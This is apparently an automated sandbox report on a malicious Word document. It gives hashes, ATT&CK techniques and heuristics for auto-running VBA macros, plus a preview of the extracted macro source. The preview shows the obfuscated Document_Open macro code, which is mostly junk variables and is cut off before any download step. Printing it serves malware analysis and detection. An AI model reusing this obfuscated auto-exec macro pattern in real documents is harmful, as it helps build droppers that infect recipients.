Office (OLE) malware analysis — malicious · 7a6e49d015dd1703

MALICIOUS

Office (OLE)

202.7 KB Created: 2019-12-20 07:10:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: a7c9f14787310f896c8fc3fb8b37da00 SHA-1: 902702591d91b637627a7775145b45cc4b84174c SHA-256: 7a6e49d015dd17031f8787561d96280641dbf43c4899e931bf65e6fc6775ef23

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an Office document containing VBA macros, specifically a Document_Open macro designed to execute automatically. The presence of GetObject calls and p-code execution tokens strongly suggests an attempt to run malicious code. While the VBA code itself is heavily obfuscated and truncated, the overall pattern indicates it's designed to download and execute a second-stage payload.

Heuristics 5

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13029 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13029 bytes
SHA-256: `01c215d24daeefe990969e8c05c3b03bd61a086b369c7269601a3135fcc078a7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Vxhmmvbaq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Uvyizjypph, 0, 0, MSForms, TextBox" Private Sub Document_open() Dim Qfxrbphtdohcu As String Dim Vzhnsdtsv As String Zpjrgufusy = Yhvepkxf Siyfeutxm = (Pqrjlimx) Kewjgxyeiymou = 61 Dim Tapkaulo As Boolean Rdvdbkhyfh = "Accusamus ab eum sed." Dim Wyxvtecn As Double Dim Uisixmyeyquz As Double Dim Dahoeqopyreq As String Bgloiviml = (194) Dim Vzajnhwjes As Double Dim Oilgfkbegytdr As Integer Rtkqpocjq = Ljhhjnijx Dim Odckofwgxrice As String Dim Bdilzuszyrwz As Boolean Dim Uhgzuehne As String Nkqocgcqplfbl = (Wddsrfga) Cdkmmoyipl = ("Laboriosam quaerat.") Kwltjztp = (Sridjmirgjnf) Dim Sedxgtwv As Double Thhywhgnchks = Emaxfaoewh Wzydftpqq Dim Gkumihrvjg As Double Dim Dkcczrfto As String Uuhlarewpp = Usrfkdszyx Glawtnzykaar = (Refjutuzhjhlv) Wlxtpfpqhdcqk = 106 Dim Szdomntodiwg As String Ohrjcopcymq = "Animi et et aliquam." Dim Xgrckznrhhg As Integer Dim Cxultylasv As Boolean Dim Imepbrykz As Boolean Lfmhpzhzk = (350) Dim Lrimtrqnelgv As Boolean Dim Jbfqitihpi As String Rvalvabob = Oygtlqwfj Dim Gxbjclkecahm As Integer Dim Mspgunlwvqrb As Double Dim Qscvwwodklype As Integer Ghmgyyygzp = (Kcksalnnjx) Dgjieieiolo = ("Sint dolore est architecto et molestiae.") Vcysldgzn = (Ztxerjbi) Dim Crppcqlotznbm As Double Pvxteqqcii = Zrfkgmjski End Sub Attribute VB_Name = "Qzuqpezagbmaa" Attribute VB_Base = "0{0982BE0D-4F0C-4E72-8F27-23E0D733C353}{1F187481-6304-4745-AF4B-2656848B55EB}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Miqfbsgds" Function Vfbbzngres() Dim Pxrhifzlzvlc As String Dim Xpfftqarxt As String Ngxvkylofaace = Qoeroetmumk Syaxymssod = (Rkhwocatzkc) Usuucjzo = 743 Dim Gadeshybksext As String Gkkpkhvhveu = "Tempora cumque modi quia." Dim Mumzpoawlyima As String Dim Axwyiewzpyro As Integer Dim Hayjapqgfiek As Double Lbdjzegyhvpu = (910) Dim Xaxaqeexkcas As String Dim Souylbnnviog As String Sctfzuifl = Oqnraigcmgtb Dim Nijeoljsvf As Boolean Dim Vtglncqdwl As Boolean Dim Uaiezcybcxmmz As String Slwuijrnnwatq = (Mcinjodfstg) Xhummgxsz = ("Magnam consectetur labore.") Mdmuhziiqnk = (Lqipgebc) Dim Pgbngknwmm As Double Gbixtlyp = Xqawximvooh Ytgqobwapext = Vxhmmvbaq.Uvyizjypph Dim Ywdggzsakinwk As Integer Dim Mthdwzpnoli As String Pmiyobtov = Yqqmuzvs Rwfdjwiiov = (Jlyaohixb) Gegjdsoqpbvy = 796 Dim Vffkghfd As Double Fnuknkrla = "Corey" Dim Zcnfpzeihomix As Double Dim Dnvjmdpa As Double Dim Xdcfjjxldwc As Boolean Qhauirsex = (542) Dim Geqqrvjciq As Double Dim Ccxeoxuxzliec As Integer Gilkamqyet = Hmzjoylyskmd Dim Tlvwlogm As Double Dim Xfrjldslidml As String Dim Tfrnqvwi As Boolean Tfdiisnvifmih = (Orbveqiltc) Svhxocuqgzkcp = ("Quidem accusamus.") Cuqlypacevmz = (Ukgcuvzbhx) Dim Lfohyfozfqc As String Istdcbdnf = Davusbmteld Cghzatntygqc = Ytgqobwapext + Qzuqpezagbmaa.Dzglcoabtn + Qzuqpezagbmaa.Vxqripsemcmx + Qzuqpezagbmaa.Sgydedibfwog Dim Lugkrqtb As String Dim Avlkjhwqphxb As String Ijkdbmlmixqrq = Bevofaemsrzjk Cjoibifqzqjo = (Urqfsncbmzx) Slccbkqugdiop = 722 Dim Wywmrxxajdr As Double Bxplylmfwni = "Ratione porro optio dolorem saepe repellendus repudiandae cumque autem." Dim Uooiqdqoeodkl As Double Dim Ksyjvbtjnxqd As Double Dim Zkojvdima As Integer Yawimammrve = (885) Dim Hvbfalzaggedo As Double Dim Vmyslvxawab As Double Rtmvwpbab = Pnnsurexzw Dim Wldckuef As Double Dim Vintihzapuj As Integer Dim Xifgevex As Double Oqktnrgx = (Asefaixyzg) Kifufozjurnh = ("Doloribus consequuntur ducimus esse quia ea qui a.") Ynlijwmz = (Dzfwygybe) Dim Bntlrxosi As Double Hxjjmqxzikgaq = Dkotlcdxxa Domfzqsqs = Cghzatntygqc + Qzuqpez ... (truncated)

SHA-256: 01c215d24daeefe990969e8c05c3b03bd61a086b369c7269601a3135fcc078a7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Vxhmmvbaq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Uvyizjypph, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Dim Qfxrbphtdohcu As String
Dim Vzhnsdtsv As String
Zpjrgufusy = Yhvepkxf
Siyfeutxm = (Pqrjlimx)
Kewjgxyeiymou = 61
Dim Tapkaulo As Boolean
Rdvdbkhyfh = "Accusamus ab eum sed."
Dim Wyxvtecn As Double
Dim Uisixmyeyquz As Double
Dim Dahoeqopyreq As String
Bgloiviml = (194)
Dim Vzajnhwjes As Double
Dim Oilgfkbegytdr As Integer
Rtkqpocjq = Ljhhjnijx
Dim Odckofwgxrice As String
Dim Bdilzuszyrwz As Boolean
Dim Uhgzuehne As String
Nkqocgcqplfbl = (Wddsrfga)
Cdkmmoyipl = ("Laboriosam quaerat.")
Kwltjztp = (Sridjmirgjnf)
Dim Sedxgtwv As Double
Thhywhgnchks = Emaxfaoewh
Wzydftpqq
   Dim Gkumihrvjg As Double
Dim Dkcczrfto As String
Uuhlarewpp = Usrfkdszyx
Glawtnzykaar = (Refjutuzhjhlv)
Wlxtpfpqhdcqk = 106
Dim Szdomntodiwg As String
Ohrjcopcymq = "Animi et et aliquam."
Dim Xgrckznrhhg As Integer
Dim Cxultylasv As Boolean
Dim Imepbrykz As Boolean
Lfmhpzhzk = (350)
Dim Lrimtrqnelgv As Boolean
Dim Jbfqitihpi As String
Rvalvabob = Oygtlqwfj
Dim Gxbjclkecahm As Integer
Dim Mspgunlwvqrb As Double
Dim Qscvwwodklype As Integer
Ghmgyyygzp = (Kcksalnnjx)
Dgjieieiolo = ("Sint dolore est architecto et molestiae.")
Vcysldgzn = (Ztxerjbi)
Dim Crppcqlotznbm As Double
Pvxteqqcii = Zrfkgmjski
End Sub

Attribute VB_Name = "Qzuqpezagbmaa"
Attribute VB_Base = "0{0982BE0D-4F0C-4E72-8F27-23E0D733C353}{1F187481-6304-4745-AF4B-2656848B55EB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Miqfbsgds"
Function Vfbbzngres()
   Dim Pxrhifzlzvlc As String
Dim Xpfftqarxt As String
Ngxvkylofaace = Qoeroetmumk
Syaxymssod = (Rkhwocatzkc)
Usuucjzo = 743
Dim Gadeshybksext As String
Gkkpkhvhveu = "Tempora cumque modi quia."
Dim Mumzpoawlyima As String
Dim Axwyiewzpyro As Integer
Dim Hayjapqgfiek As Double
Lbdjzegyhvpu = (910)
Dim Xaxaqeexkcas As String
Dim Souylbnnviog As String
Sctfzuifl = Oqnraigcmgtb
Dim Nijeoljsvf As Boolean
Dim Vtglncqdwl As Boolean
Dim Uaiezcybcxmmz As String
Slwuijrnnwatq = (Mcinjodfstg)
Xhummgxsz = ("Magnam consectetur labore.")
Mdmuhziiqnk = (Lqipgebc)
Dim Pgbngknwmm As Double
Gbixtlyp = Xqawximvooh
Ytgqobwapext = Vxhmmvbaq.Uvyizjypph
   Dim Ywdggzsakinwk As Integer
Dim Mthdwzpnoli As String
Pmiyobtov = Yqqmuzvs
Rwfdjwiiov = (Jlyaohixb)
Gegjdsoqpbvy = 796
Dim Vffkghfd As Double
Fnuknkrla = "Corey"
Dim Zcnfpzeihomix As Double
Dim Dnvjmdpa As Double
Dim Xdcfjjxldwc As Boolean
Qhauirsex = (542)
Dim Geqqrvjciq As Double
Dim Ccxeoxuxzliec As Integer
Gilkamqyet = Hmzjoylyskmd
Dim Tlvwlogm As Double
Dim Xfrjldslidml As String
Dim Tfrnqvwi As Boolean
Tfdiisnvifmih = (Orbveqiltc)
Svhxocuqgzkcp = ("Quidem accusamus.")
Cuqlypacevmz = (Ukgcuvzbhx)
Dim Lfohyfozfqc As String
Istdcbdnf = Davusbmteld
Cghzatntygqc = Ytgqobwapext + Qzuqpezagbmaa.Dzglcoabtn + Qzuqpezagbmaa.Vxqripsemcmx + Qzuqpezagbmaa.Sgydedibfwog
   Dim Lugkrqtb As String
Dim Avlkjhwqphxb As String
Ijkdbmlmixqrq = Bevofaemsrzjk
Cjoibifqzqjo = (Urqfsncbmzx)
Slccbkqugdiop = 722
Dim Wywmrxxajdr As Double
Bxplylmfwni = "Ratione porro optio dolorem saepe repellendus repudiandae cumque autem."
Dim Uooiqdqoeodkl As Double
Dim Ksyjvbtjnxqd As Double
Dim Zkojvdima As Integer
Yawimammrve = (885)
Dim Hvbfalzaggedo As Double
Dim Vmyslvxawab As Double
Rtmvwpbab = Pnnsurexzw
Dim Wldckuef As Double
Dim Vintihzapuj As Integer
Dim Xifgevex As Double
Oqktnrgx = (Asefaixyzg)
Kifufozjurnh = ("Doloribus consequuntur ducimus esse quia ea qui a.")
Ynlijwmz = (Dzfwygybe)
Dim Bntlrxosi As Double
Hxjjmqxzikgaq = Dkotlcdxxa
Domfzqsqs = Cghzatntygqc + Qzuqpez
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.